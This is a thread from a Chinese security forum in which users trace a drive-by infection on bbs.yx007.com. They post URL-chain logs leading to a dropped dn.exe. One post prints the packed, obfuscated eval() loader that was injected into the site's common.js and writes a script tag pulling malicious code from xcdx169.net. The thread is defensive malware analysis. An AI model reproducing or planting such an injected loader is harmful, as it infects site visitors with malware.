瑞星卡卡安全论坛

Log is generated by FreShow.
[wide]http://bbs.yx007.com/
    [script]http://bbs.yx007.com/forumdata/cache/common.js?zbz
        [object]http://bbs.xcdx169.net/include/log.js?ZUBQFIRA
            [frame]http://www.moto8.cn/forumdata/plus/dn.htm?k0223
                [object]http://www.moto8.cn/forumdata/plus/dn.exe
    [script]http://w.cnzz.com/c.php?id=30025099

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)

[script]http://bbs.yx007.com/forumdata/cache/common.js?zbz

这里不会了

想通了要清理一下后面的垃圾后才行
关于:hxxp://bbs.yx007.com/forumdata/cache/common.js?zbz解密的日志(全体输出 -  6):

Level  1>http://bbs.yx007.com/forumdata/cache/common.js?zbz
Level  2>http://bbs.xcdx169.net/include/log.js?ZUBQFIRA
Level  3>http://www.moto8.cn/forumdata/plus/dn.htm?k0223
Level  4>http://www.moto8.cn/forumdata/plus/XIGUA.GIF
Level  4>http://www.moto8.cn/forumdata/plus/dn.exe
Level  2>http://w.cnzz.com/c.php?id=30025099

日志由 Redoce2.0第88次修正版于 2010-3-8 13:22:49 生成。

你要搞清楚是怎么来的呀:kaka6:

Log is generated by FreShow.
[wide]http://bbs.yx007.com
    [script]http://bbs.yx007.com/forumdata/cache/common.js?zbz
        [object]http://bbs.xcdx169.net/include/log.js?zubqfira
            [frame]http://www.moto8.cn/forumdata/plus/dn.htm?k0223
                [object]http://www.moto8.cn/forumdata/plus/dn.exe
    [script]http://w.cnzz.com/c.php?id=30025099

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('4.5(\'<0 3=2 1="6://d.7.c/b/a.8?9"></0>\')',14,14,'script|src|javascript|language|document|writeln|http|xcdx169|js|ZUBQFIRA|log|include|net|bbs'.split('|'),0,{}));}

eval()后面多了两个;}没注意看

Log is generated by FreShow.
[wide]http://bbs.yx007.com/
    [script]http://bbs.yx007.com/forumdata/cache/common.js?zbz
        [script]http://bbs.xcdx169.net/include/log.js?ZUBQFIRA
            [frame]http://bbs.xcdx169.net/include/http:\/\/www.moto8.cn\/forumdata\/plus\/dn.htm?k0223
                [object]http://www.moto8.cn/forumdata/plus/dn.exe
    [script]http://w.cnzz.com/c.php?id=30025099


这个网站好象不是第一次带马了,真悲剧,看样子不是什么安全的网站